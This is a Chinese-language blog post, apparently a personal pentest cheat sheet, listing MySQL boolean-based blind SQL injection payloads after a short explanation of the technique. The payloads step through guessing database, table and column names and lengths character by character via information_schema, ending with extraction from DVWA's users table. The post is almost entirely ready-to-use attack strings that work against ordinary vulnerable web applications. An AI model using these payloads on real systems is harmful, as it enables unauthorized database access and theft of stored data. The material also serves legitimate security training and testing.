MySQL基于布尔型盲注常用语句

什么是盲注?

基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。
这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。

常用语句汇总


查询所有数据库

1.判断表存不存在
1
and exists(select * from information_schema.tables)
2.判断存在多少个库
1
and (select count(distinct+table_schema) from information_schema.tables)>4
3.判断库名的长度
1
and (select length(table_schema) from information_schema.tables limit 0,1) >17
4.接下来爆每个库的库名
1
and (select ascii(substr((select distinct table_schema from information_schema.tables limit 0,1),1,1)))>104
5.猜表,首先判断表的长度
1
and (select length(table_name) from information_schema.tables where table_schema='information_schema' limit 0,1) >13
6.判断完表的长度之后就要开始猜解表的字符
1
and (select ascii(substr((select table_name from information_schema.tables where table_schema='information_schema' limit 0,1),1,1))) >66
7.再接下来猜解表里边的字段即列,首先统计一下有多少个字段
1
and (select count(column_name) from information_schema.columns where table_schema='information_schema' and table_name='CHARACTER_SETS' ) >4
8.判断每个字段的长度
1
and (select length(column_name) from information_schema.columns where table_schema='information_schema' and table_name='CHARACTER_SETS' limit 0,1 ) >17
9.接下来猜第一个字段的字符
1
and (select ascii(substr((select column_name from information_schema.columns where table_schema='information_schema' and table_name='CHARACTER_SETS' limit 0,1),1,1)) ) >66

查询当前数据库

1.查询数据库的长度
1
and length(database()) > 4
2.查询数据库名
1
and ascii(substr((select database()),1,1)) > 99
3.查询表名的长度
1
and (select(length(table_name)) from information_schema.tables where table_schema = 0x64767761 limit 0,1) > 8+--+
4.查询表名
1
and ascii(substr((select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1),1,1)) > 116
5.查询列名的长度
1
and (select(length(column_name)) from information_schema.columns where table_name = 0x7573657273 limit 0,1) > 6
6.查询列名
1
and ascii(substr((select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1),1,1)) > 116
7.查询字段的长度
1
and (select length(column_name) from information_schema.columns where table_name=0x7573657273 limit 1,1 ) >10
8.爆出字段
1
and ascii(substr((select user from dvwa.users limit 0,1),1,1)) > 96

Powered by Hexo and Hexo-theme-hiker

Copyright © 2017 - 2019 Damit5's Blog All Rights Reserved.

UV : | PV :